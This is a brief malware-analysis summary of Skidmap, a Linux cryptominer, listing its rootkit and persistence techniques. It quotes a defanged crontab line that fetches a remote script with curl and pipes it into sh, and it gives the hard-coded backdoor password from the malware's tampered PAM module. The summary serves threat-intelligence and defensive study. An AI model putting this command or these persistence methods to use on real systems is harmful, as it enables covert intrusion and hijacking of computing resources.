Skidmap is a cryptocurrency-mining malware first seen in 2019 that targets Linux systems.
Skidmap employs the use of several anti-analysis and persistence techniques:
- a userland rootkit using LD_PRELOAD
- installing crontab persistence: */1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh
- disabling SELinux
- adds a hard-coded SSH key to the root user’s authorized_keys file
- sets the authorized_keys file as immutable
- replaces pam_unix.so with a copy that grants access when provided with a hard-coded password Mtm$%889*G*S3%G
- replaces the ‘rm’ command with one that re-installs the crontab persistence
- logs stolen credentials to /usr/include/ilog.h
- decrypts payload components using the openssl command
- runs a watchdog process to make sure the mining component is running
- the /usr/bin/kaudited binary drops and installs an LKM rootkit that hides network traffic of the attacker and CPU usage statistics of the mining process